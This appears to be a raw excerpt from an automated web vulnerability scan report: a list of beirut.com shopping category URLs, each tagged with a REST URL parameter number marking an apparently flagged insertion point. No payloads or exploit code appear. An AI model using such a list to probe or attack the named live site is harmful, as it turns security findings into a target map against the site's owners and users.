http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Music/72 [REST URL parameter 5]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48 [REST URL parameter 3]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48 [REST URL parameter 4]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48 [REST URL parameter 5]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47 [REST URL parameter 3]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47 [REST URL parameter 4]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47 [REST URL parameter 5]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories/37 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories/37 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories/37 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories/37 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories/37 [REST URL parameter 3]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories/37 [REST URL parameter 4]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories/37 [REST URL parameter 5]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Bags/40 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Bags/40 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Bags/40 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Bags/40 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Bags/40 [REST URL parameter 3]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Bags/40 [REST URL parameter 4]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Bags/40 [REST URL parameter 5]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8 [REST URL parameter 3]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8 [REST URL parameter 4]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8 [REST URL parameter 5]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Cosmetics/34 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Cosmetics/34 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Cosmetics/34 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Cosmetics/34 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Cosmetics/34 [REST URL parameter 3]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Cosmetics/34 [REST URL parameter 4]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Cosmetics/34 [REST URL parameter 5]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Fragrance/39 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Fragrance/39 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Fragrance/39 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Fragrance/39 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Fragrance/39 [REST URL parameter 3]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Fragrance/39 [REST URL parameter 4]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Fragrance/39 [REST URL parameter 5]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 [REST URL parameter 3]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 [REST URL parameter 4]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 [REST URL parameter 5]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73 [REST URL parameter 3]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73 [REST URL parameter 4]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73 [REST URL parameter 5]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hats/56 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hats/56 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hats/56 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hats/56 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hats/56 [REST URL parameter 3]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hats/56 [REST URL parameter 4]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hats/56 [REST URL parameter 5]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Jewelry/23 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Jewelry/23 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Jewelry/23 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Jewelry/23 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Jewelry/23 [REST URL parameter 3]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Jewelry/23 [REST URL parameter 4]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Jewelry/23 [REST URL parameter 5]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76 [REST URL parameter 3]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76 [REST URL parameter 4]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76 [REST URL parameter 5]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Shoes/26 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Shoes/26 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Shoes/26 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Shoes/26 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Shoes/26 [REST URL parameter 3]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Shoes/26 [REST URL parameter 4]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Shoes/26 [REST URL parameter 5]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Swimwear/53 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Swimwear/53 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Swimwear/53 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Swimwear/53 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Swimwear/53 [REST URL parameter 3]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Swimwear/53 [REST URL parameter 4]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Swimwear/53 [REST URL parameter 5]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Watches/36 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Watches/36 [REST URL parameter 1]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Watches/36 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Watches/36 [REST URL parameter 2]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Watches/36 [REST URL parameter 3]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Watches/36 [REST URL parameter 4]
http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Watches/36 [REST URL parameter 5]
http://www.beirut.com/Shopping/Consumer-Goods/235690923 [REST URL parameter 1]
http://www.beirut.com/Shopping/Consumer-Goods/235690923 [REST URL parameter 1]
http://www.beirut.com/Shopping/Consumer-Goods/235690923 [REST URL parameter 2]
http://www.beirut.com/Shopping/Consumer-Goods/235690923 [REST URL parameter 2]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Flowers/17 [REST URL parameter 1]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Flowers/17 [REST URL parameter 1]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Flowers/17 [REST URL parameter 2]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Flowers/17 [REST URL parameter 2]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Flowers/17 [REST URL parameter 3]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Flowers/17 [REST URL parameter 4]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Flowers/17 [REST URL parameter 5]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Health-Products/77 [REST URL parameter 1]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Health-Products/77 [REST URL parameter 1]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Health-Products/77 [REST URL parameter 2]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Health-Products/77 [REST URL parameter 2]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Health-Products/77 [REST URL parameter 3]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Health-Products/77 [REST URL parameter 4]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Health-Products/77 [REST URL parameter 5]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Liquor-Store/70 [REST URL parameter 1]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Liquor-Store/70 [REST URL parameter 1]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Liquor-Store/70 [REST URL parameter 2]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Liquor-Store/70 [REST URL parameter 2]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Liquor-Store/70 [REST URL parameter 3]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Liquor-Store/70 [REST URL parameter 4]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Liquor-Store/70 [REST URL parameter 5]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Luggage/41 [REST URL parameter 1]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Luggage/41 [REST URL parameter 1]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Luggage/41 [REST URL parameter 2]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Luggage/41 [REST URL parameter 2]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Luggage/41 [REST URL parameter 3]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Luggage/41 [REST URL parameter 4]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Luggage/41 [REST URL parameter 5]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Party-Supplies/25 [REST URL parameter 1]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Party-Supplies/25 [REST URL parameter 1]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Party-Supplies/25 [REST URL parameter 2]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Party-Supplies/25 [REST URL parameter 2]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Party-Supplies/25 [REST URL parameter 3]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Party-Supplies/25 [REST URL parameter 4]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Party-Supplies/25 [REST URL parameter 5]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Pet-Store/71 [REST URL parameter 1]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Pet-Store/71 [REST URL parameter 1]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Pet-Store/71 [REST URL parameter 2]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Pet-Store/71 [REST URL parameter 2]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Pet-Store/71 [REST URL parameter 3]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Pet-Store/71 [REST URL parameter 4]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Pet-Store/71 [REST URL parameter 5]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Roastary/78 [REST URL parameter 1]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Roastary/78 [REST URL parameter 1]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Roastary/78 [REST URL parameter 2]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Roastary/78 [REST URL parameter 2]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Roastary/78 [REST URL parameter 3]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Roastary/78 [REST URL parameter 4]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Roastary/78 [REST URL parameter 5]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45 [REST URL parameter 1]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45 [REST URL parameter 1]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45 [REST URL parameter 2]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45 [REST URL parameter 2]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45 [REST URL parameter 3]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45 [REST URL parameter 4]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45 [REST URL parameter 5]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79 [REST URL parameter 1]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79 [REST URL parameter 1]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79 [REST URL parameter 2]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79 [REST URL parameter 2]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79 [REST URL parameter 3]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79 [REST URL parameter 4]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79 [REST URL parameter 5]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Tobacconist/29 [REST URL parameter 1]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Tobacconist/29 [REST URL parameter 1]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Tobacconist/29 [REST URL parameter 2]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Tobacconist/29 [REST URL parameter 2]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Tobacconist/29 [REST URL parameter 3]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Tobacconist/29 [REST URL parameter 4]
http://www.beirut.com/Shopping/Consumer-Goods/235690923/Tobacconist/29 [REST URL parameter 5]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286 [REST URL parameter 1]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286 [REST URL parameter 1]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286 [REST URL parameter 2]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286 [REST URL parameter 2]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74 [REST URL parameter 1]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74 [REST URL parameter 1]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74 [REST URL parameter 2]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74 [REST URL parameter 2]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74 [REST URL parameter 3]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74 [REST URL parameter 4]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74 [REST URL parameter 5]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55 [REST URL parameter 1]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55 [REST URL parameter 1]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55 [REST URL parameter 2]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55 [REST URL parameter 2]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55 [REST URL parameter 3]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55 [REST URL parameter 4]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55 [REST URL parameter 5]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24 [REST URL parameter 1]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24 [REST URL parameter 1]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24 [REST URL parameter 2]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24 [REST URL parameter 2]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24 [REST URL parameter 3]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24 [REST URL parameter 4]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24 [REST URL parameter 5]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Stationery/64 [REST URL parameter 1]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Stationery/64 [REST URL parameter 1]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Stationery/64 [REST URL parameter 2]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Stationery/64 [REST URL parameter 2]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Stationery/64 [REST URL parameter 3]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Stationery/64 [REST URL parameter 4]
http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Stationery/64 [REST URL parameter 5]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082 [REST URL parameter 1]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082 [REST URL parameter 1]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082 [REST URL parameter 2]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082 [REST URL parameter 2]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1 [REST URL parameter 1]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1 [REST URL parameter 1]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1 [REST URL parameter 2]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1 [REST URL parameter 2]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1 [REST URL parameter 3]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1 [REST URL parameter 4]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1 [REST URL parameter 5]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Art/2 [REST URL parameter 1]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Art/2 [REST URL parameter 1]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Art/2 [REST URL parameter 2]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Art/2 [REST URL parameter 2]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Art/2 [REST URL parameter 3]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Art/2 [REST URL parameter 4]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Art/2 [REST URL parameter 5]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51 [REST URL parameter 1]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51 [REST URL parameter 1]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51 [REST URL parameter 2]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51 [REST URL parameter 2]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51 [REST URL parameter 3]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51 [REST URL parameter 4]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51 [REST URL parameter 5]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/China-Glassware/7 [REST URL parameter 1]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/China-Glassware/7 [REST URL parameter 1]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/China-Glassware/7 [REST URL parameter 2]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/China-Glassware/7 [REST URL parameter 2]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/China-Glassware/7 [REST URL parameter 3]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/China-Glassware/7 [REST URL parameter 4]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/China-Glassware/7 [REST URL parameter 5]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9 [REST URL parameter 1]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9 [REST URL parameter 1]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9 [REST URL parameter 2]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9 [REST URL parameter 2]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9 [REST URL parameter 3]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9 [REST URL parameter 4]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9 [REST URL parameter 5]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture/19 [REST URL parameter 1]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture/19 [REST URL parameter 1]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture/19 [REST URL parameter 2]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture/19 [REST URL parameter 2]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture/19 [REST URL parameter 3]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture/19 [REST URL parameter 4]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture/19 [REST URL parameter 5]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65 [REST URL parameter 1]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65 [REST URL parameter 1]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65 [REST URL parameter 2]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65 [REST URL parameter 2]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65 [REST URL parameter 3]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65 [REST URL parameter 4]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65 [REST URL parameter 5]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 [REST URL parameter 1]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 [REST URL parameter 1]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 [REST URL parameter 2]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 [REST URL parameter 2]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 [REST URL parameter 3]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 [REST URL parameter 4]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 [REST URL parameter 5]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tapistry/50 [REST URL parameter 1]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tapistry/50 [REST URL parameter 1]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tapistry/50 [REST URL parameter 2]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tapistry/50 [REST URL parameter 2]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tapistry/50 [REST URL parameter 3]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tapistry/50 [REST URL parameter 4]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tapistry/50 [REST URL parameter 5]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Textiles/4 [REST URL parameter 1]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Textiles/4 [REST URL parameter 1]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Textiles/4 [REST URL parameter 2]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Textiles/4 [REST URL parameter 2]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Textiles/4 [REST URL parameter 3]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Textiles/4 [REST URL parameter 4]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Textiles/4 [REST URL parameter 5]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30 [REST URL parameter 1]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30 [REST URL parameter 1]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30 [REST URL parameter 2]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30 [REST URL parameter 2]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30 [REST URL parameter 3]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30 [REST URL parameter 4]
http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30 [REST URL parameter 5]
http://www.beirut.com/Shopping/Shopping-Centers/492064852 [REST URL parameter 1]
http://www.beirut.com/Shopping/Shopping-Centers/492064852 [REST URL parameter 1]
http://www.beirut.com/Shopping/Shopping-Centers/492064852 [REST URL parameter 2]
http://www.beirut.com/Shopping/Shopping-Centers/492064852 [REST URL parameter 2]
